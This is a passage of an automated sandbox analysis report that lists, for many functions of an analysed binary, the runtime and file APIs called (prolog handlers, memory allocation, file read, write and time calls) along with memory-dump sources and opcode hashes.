                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: a152d189253fdf4e4b4b2e06ec7a75f55b5d6f2a3e6a14acfca893172ff89608
                                                                                                    • Instruction ID: 13fd31eb27cf16994f0c4d354fa5250f7606c8b9d22f8886ed07a8c016e039dd
                                                                                                    • Opcode Fuzzy Hash: a152d189253fdf4e4b4b2e06ec7a75f55b5d6f2a3e6a14acfca893172ff89608
                                                                                                    • Instruction Fuzzy Hash: 901104729002189BDF1BFBA0D8627FEBB74AF44758F00402AE5027B6A3CF345D09C654
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C5416 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 4031de4f56224b3c2bca8e1609368b487923c2a3cd1ac49b6da41c9d8fad4b07
                                                                                                    • Instruction ID: 7cdc306ee3dc3f34f68ae7000481fb6e8668eeab59c93ccb9a6b764c1a55e1f8
                                                                                                    • Opcode Fuzzy Hash: 4031de4f56224b3c2bca8e1609368b487923c2a3cd1ac49b6da41c9d8fad4b07
                                                                                                    • Instruction Fuzzy Hash: 4A117C71608644EFCB0ACFAAD484FA97BB9FF45305F5980EDE0198B522C775A984CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C6A27 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003C6A2C
                                                                                                      • Part of subcall function 003B695D: __EH_prolog.LIBCMT ref: 003B6962
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                      • Part of subcall function 003B7253: GetLastError.KERNEL32(003BB86C), ref: 003B7253
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ErrorLastfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 683690243-0
                                                                                                    • Opcode ID: ba293084ed3527d3be7073f1f148149372d70ab19bddfdee005293fe4c2ea48b
                                                                                                    • Instruction ID: 6cf4747dcb3121fe794faed8a08f35793139d57cc9c72047b2e6fa1da65df69c
                                                                                                    • Opcode Fuzzy Hash: ba293084ed3527d3be7073f1f148149372d70ab19bddfdee005293fe4c2ea48b
                                                                                                    • Instruction Fuzzy Hash: AF0108766403409FC722EF74C4929DEBBB1EF45314B00862EE5435BA92CA34A90DCB40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7788 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,003B1AD1,00000000,00000002,00000002,?,003B7814,?,00000000), ref: 003B77D3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 1425588814-0
                                                                                                    • Opcode ID: 113be2d3de9dd80ceb483393d8d30145e0c7a208c30fe3b1bf5809a10b908e75
                                                                                                    • Instruction ID: 2e1a6e16a00f3b4fc02e77e10f0636842c8f61af6d6b8bb83b4a798f438cd586
                                                                                                    • Opcode Fuzzy Hash: 113be2d3de9dd80ceb483393d8d30145e0c7a208c30fe3b1bf5809a10b908e75
                                                                                                    • Instruction Fuzzy Hash: FC01FD30104249BFEF268F14CC06BEA3FA9EB45324F048209B9A6966E1DAB09E10CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E9B0F Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EAED4
                                                                                                      • Part of subcall function 003D5DC6: __EH_prolog.LIBCMT ref: 003D5DCB
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2654054672-0
                                                                                                    • Opcode ID: 133864de5a4a1038a24d0cb759810f760d0696b59c7e5f987c13ccf3270a496e
                                                                                                    • Instruction ID: ecb6898468a53a0411c4d1625bf1a1771b7474e6cb37fdc6d01fd27b37317f05
                                                                                                    • Opcode Fuzzy Hash: 133864de5a4a1038a24d0cb759810f760d0696b59c7e5f987c13ccf3270a496e
                                                                                                    • Instruction Fuzzy Hash: 74F0E973A00B719BD717AF4AD8817AEF3A9EF94324F11412FF5025B641CBB4EC018655
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EF0D9 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EF0DE
                                                                                                      • Part of subcall function 003EEF73: __EH_prolog.LIBCMT ref: 003EEF78
                                                                                                      • Part of subcall function 003EEF1D: __EH_prolog.LIBCMT ref: 003EEF22
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                      • Part of subcall function 003EF152: __EH_prolog.LIBCMT ref: 003EF157
                                                                                                      • Part of subcall function 003EED9A: __EH_prolog.LIBCMT ref: 003EED9F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2654054672-0
                                                                                                    • Opcode ID: f0d52d9597678b9c3ca01052d6376736d2086bcd1e54df77bb490915e9825889
                                                                                                    • Instruction ID: bd8df36442fd7a57c6ab2b3b253f70e798971b141cb5ba960ec880249d5eb481
                                                                                                    • Opcode Fuzzy Hash: f0d52d9597678b9c3ca01052d6376736d2086bcd1e54df77bb490915e9825889
                                                                                                    • Instruction Fuzzy Hash: F1F0F4319106A4DECB1BFBA8C8127DDBBE1AF04318F50465DE452576C2CBB86A009649
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E7365 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: e9b6924174caad6c80ef9fdf02199c94a430939569a6a3b1133027a09e809633
                                                                                                    • Instruction ID: 7857e696df7c3a0ea13cfc94bcedf7245215980351de99893b1a51242ead92df
                                                                                                    • Opcode Fuzzy Hash: e9b6924174caad6c80ef9fdf02199c94a430939569a6a3b1133027a09e809633
                                                                                                    • Instruction Fuzzy Hash: C2F0CD32E1002AEBCB01EF9AD8409EFBB78FF84780B00852AF406E7250C7348A05CB94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B1524 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B1529
                                                                                                      • Part of subcall function 003B1E0C: malloc.MSVCRT ref: 003B1E1F
                                                                                                      • Part of subcall function 003B1E0C: _CxxThrowException.MSVCRT(?,00430098), ref: 003B1E39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionH_prologThrowmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3978722251-0
                                                                                                    • Opcode ID: d4680b7b958fa4388410f4f9fb7d5fadf6e14a938ab8c738f14c0171ae033c31
                                                                                                    • Instruction ID: e0b4144f8d157c11838a727b6dbf84e7cc8edf3167692f9329fa4dd4de53f959
                                                                                                    • Opcode Fuzzy Hash: d4680b7b958fa4388410f4f9fb7d5fadf6e14a938ab8c738f14c0171ae033c31
                                                                                                    • Instruction Fuzzy Hash: FAF08271610100EFDB19DF18D012BEEB7E1EF49308F00856FE51A97A40D7B4A9008644
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EF028 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EF02D
                                                                                                      • Part of subcall function 003EF23F: _CxxThrowException.MSVCRT(?,0042FFC8), ref: 003EF265
                                                                                                      • Part of subcall function 003B1E0C: malloc.MSVCRT ref: 003B1E1F
                                                                                                      • Part of subcall function 003B1E0C: _CxxThrowException.MSVCRT(?,00430098), ref: 003B1E39
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionThrow$H_prologmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3044594480-0
                                                                                                    • Opcode ID: 92a53178655db7557e720c8bb9ffc461041c9b1f0233091b5a214cf98d3d2e5a
                                                                                                    • Instruction ID: f78223c9b52e01f9fdc9f2aa037060ff971dd5fb90c738969379918da702f69c
                                                                                                    • Opcode Fuzzy Hash: 92a53178655db7557e720c8bb9ffc461041c9b1f0233091b5a214cf98d3d2e5a
                                                                                                    • Instruction Fuzzy Hash: 60F0E5B1600251DFCB18FF78C0016AAB3E1EF48304B00CA7EA44AD7781DBB19900C744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D864F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: d6a225fba53232028011d4a177854899e7660cfc03c53e6f5860a70057d5c4e5
                                                                                                    • Instruction ID: 4012d36fa6db5f5db3b1b703bb129e553749cd62eed6c396948e1e0c2a53b0e5
                                                                                                    • Opcode Fuzzy Hash: d6a225fba53232028011d4a177854899e7660cfc03c53e6f5860a70057d5c4e5
                                                                                                    • Instruction Fuzzy Hash: A2E01276614104EFC704EF99D445F9EB7B8FF49365F10845EB40AE7281C779A901CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F1B11 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F1B16
                                                                                                      • Part of subcall function 003EF5A9: __aulldiv.LIBCMT ref: 003EF632
                                                                                                      • Part of subcall function 003CCBDD: __EH_prolog.LIBCMT ref: 003CCBE2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$__aulldiv
                                                                                                    • String ID:
                                                                                                    • API String ID: 604474441-0
                                                                                                    • Opcode ID: d81c7f8f17bd409d5347ed1f89b174fab511895a78d628c88168b2400a7b3bce
                                                                                                    • Instruction ID: 6e2560a8338d5c5892682f1c63e7377f9111d156f670003899be4a368d5d8c8e
                                                                                                    • Opcode Fuzzy Hash: d81c7f8f17bd409d5347ed1f89b174fab511895a78d628c88168b2400a7b3bce
                                                                                                    • Instruction Fuzzy Hash: 77E03971A10664DECB55EFB8914169EB6F0BB08704B00456FA04AD7A81DBB8A9008B94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F4BE7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F4BEC
                                                                                                      • Part of subcall function 003F500C: __EH_prolog.LIBCMT ref: 003F5011
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 642835468deaa8cfdff98edd4e759aab38374a4c6d937bba88550ad640040d66
                                                                                                    • Instruction ID: 73228fa7732c000b978fb5ab6d165105d3124541085c17940c0d967898da0fd3
                                                                                                    • Opcode Fuzzy Hash: 642835468deaa8cfdff98edd4e759aab38374a4c6d937bba88550ad640040d66
                                                                                                    • Instruction Fuzzy Hash: F8E09272920564DACB0AEB54D4127EDB7B4EF14704F00065EA00793281CFB82A08C7A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B793E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 003B7961
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: e2e3fdc7b5ba6f2c11fbb9f97581643aa61c6721d7bd1a83339188bd926cea8f
                                                                                                    • Instruction ID: 009100085f1038a4539a3b240b7594edb57328f5b675e4a843647819c6546a92
                                                                                                    • Opcode Fuzzy Hash: e2e3fdc7b5ba6f2c11fbb9f97581643aa61c6721d7bd1a83339188bd926cea8f
                                                                                                    • Instruction Fuzzy Hash: 8FE0E575604209FBCB11CFA5C801B8E7BBAEB48358F20C069F9199A290D3399A10DF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F7CD8 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F7CDD
                                                                                                      • Part of subcall function 003F1B11: __EH_prolog.LIBCMT ref: 003F1B16
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 12e25f080e83ba9e1448d72abd8b3868cd2e2c83dd5db73dd7e26baaf7703df9
                                                                                                    • Instruction ID: a1bc2d1ae9f2fe3e5c6674e641ff3c796477d6961a18a88c98d195c930ee1422
                                                                                                    • Opcode Fuzzy Hash: 12e25f080e83ba9e1448d72abd8b3868cd2e2c83dd5db73dd7e26baaf7703df9
                                                                                                    • Instruction Fuzzy Hash: B2E09271A24A68C7D716EB64D4057EDB7A4BF04314F00C56FE496D3281DFF82908CBA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B2201 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID:
                                                                                                    • API String ID: 1795875747-0
                                                                                                    • Opcode ID: 5b391880251c5ae05db3adc3515c17f3369d500538ccbedd2d66b5a6bfa6b7b7
                                                                                                    • Instruction ID: e5c5f7cabf483b0a5fbb541090048b5f26749d3ee33e80993a00b82c6dc3e514
                                                                                                    • Opcode Fuzzy Hash: 5b391880251c5ae05db3adc3515c17f3369d500538ccbedd2d66b5a6bfa6b7b7
                                                                                                    • Instruction Fuzzy Hash: 25D01232504119ABDF156B94DC06CDD77BCFF18214B04442AF945E21A0EA75E91587A4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EE551 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EE556
                                                                                                      • Part of subcall function 003EE590: __EH_prolog.LIBCMT ref: 003EE595
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 3519838083-0
                                                                                                    • Opcode ID: 1a0d319512f982ace88eada0bc69ddbcadea2a81914a420e3414eacc8103772c
                                                                                                    • Instruction ID: 387ce9a67dbfd0fbca9acbb3a4bd27b23a37a858598da2a8a6eda6ce339ae57f
                                                                                                    • Opcode Fuzzy Hash: 1a0d319512f982ace88eada0bc69ddbcadea2a81914a420e3414eacc8103772c
                                                                                                    • Instruction Fuzzy Hash: E1D05B72A11254FBD7149F45D803BDFBB78EB41758F10492FF001A5281D3BDA90086A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B7825 Relevance: 1.5, APIs: 1, Instructions: 18fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,003B7535,00000000,00004000,00000000,00000002,?,?,?), ref: 003B783B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 2738559852-0
                                                                                                    • Opcode ID: e9dbf559ca5b6558518c0abb6e93067533a2de764e5c52b8175e0a1ec527786e
                                                                                                    • Instruction ID: 9d8997d57727bc4a23cf8dd03c7a1cb8455fd1845be7480d1309cc946d38205c
                                                                                                    • Opcode Fuzzy Hash: e9dbf559ca5b6558518c0abb6e93067533a2de764e5c52b8175e0a1ec527786e
                                                                                                    • Instruction Fuzzy Hash: 8AE0EC75200209FBDB11CF91CD45F8E7BB9AB49754F208058E905961A0D376AA24EB54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003C2A00 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                    Download Yara Rule
